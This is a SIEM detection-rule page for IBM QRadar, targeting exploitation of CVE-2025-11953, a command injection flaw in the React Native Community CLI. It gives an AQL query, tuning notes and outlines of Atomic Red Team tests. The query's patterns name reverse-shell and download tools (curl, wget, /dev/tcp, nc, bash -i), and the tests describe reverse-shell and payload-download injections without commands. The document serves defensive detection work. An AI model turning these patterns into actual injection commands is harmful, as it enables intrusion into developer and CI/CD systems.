Detect React Native Community CLI OS Command Injection (CVE-2025-11953) in IBM QRadar
Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
MITRE ATT&CK
- Tactic
- Execution Persistence Lateral Movement
QRadar Detection Query
SELECT DATEFORMAT(starttime,'YYYY-MM-dd HH:mm:ss') AS EventTime,
sourceip, destinationip, username, "Process Name", "Command",
CASE
WHEN "Command" ILIKE '%curl %' OR "Command" ILIKE '%wget %' THEN 'RemoteDownload'
WHEN "Command" ILIKE '%bash -i%' OR "Command" ILIKE '%sh -c%' THEN 'ShellExec'
WHEN "Command" ILIKE '%powershell%' OR "Command" ILIKE '%cmd /c%' THEN 'WindowsExec'
WHEN "Command" ILIKE '%/dev/tcp%' OR "Command" ILIKE '%nc %' THEN 'ReverseShell'
ELSE 'InjectionMetachar'
END AS InjectionType
FROM events
WHERE LOGSOURCETYPENAME(devicetype) IN ('Linux OS', 'Microsoft Windows Security Event Log', 'SyslogNG')
AND (
"Command" ILIKE '%react-native%'
OR "Command" ILIKE '%@react-native-community%'
OR "Process Name" ILIKE '%react-native%'
)
AND (
"Command" ILIKE '%curl %' OR "Command" ILIKE '%wget %'
OR "Command" ILIKE '%bash -%' OR "Command" ILIKE '%sh -c%'
OR "Command" ILIKE '%powershell%'
OR "Command" ILIKE '%/dev/tcp%' OR "Command" ILIKE '%nc %'
OR ("Command" LIKE '%&%' AND "Command" LIKE '%;%')
)
LAST 7 DAYSQRadar AQL query identifying events where the React Native Community CLI command line contains OS command injection metacharacters or shell invocation utilities.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate CI/CD pipelines running on QRadar-monitored hosts where react-native CLI is part of mobile build workflows.
- Developer machines with complex npm scripts that chain shell commands.
- Security scanning tools that run react-native CLI as part of SAST/DAST toolchains.
- Monorepo orchestration tools invoking react-native CLI alongside other shell utilities.
Other platforms for CVE-2025-11953
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Command Injection via React Native CLI project name argument
Expected signal: Process create event showing node spawning sh or bash with a command line containing the injected semicolon-delimited id command; file creation event for /tmp/cve_2025_11953_poc.txt.
- Test 2Reverse shell injection via React Native CLI on Linux
Expected signal: Process create events for node → sh → id; file write to /tmp/rn_inject_test.txt containing the output of id.
- Test 3Remote payload download via injected curl in React Native CLI build context
Expected signal: Process create event for node spawning sh, which spawns curl with an external URL argument; network connection event for curl to destination host.
- Test 4Windows PowerShell injection via React Native CLI on Windows
Expected signal: Sysmon Event ID 1 showing node.exe spawning cmd.exe which spawns powershell.exe; file creation event in %TEMP% for rn_inject_test.txt.
Unlock Pro Content
Get the full detection package for CVE-2025-11953 including response playbook, investigation guide, and atomic red team tests.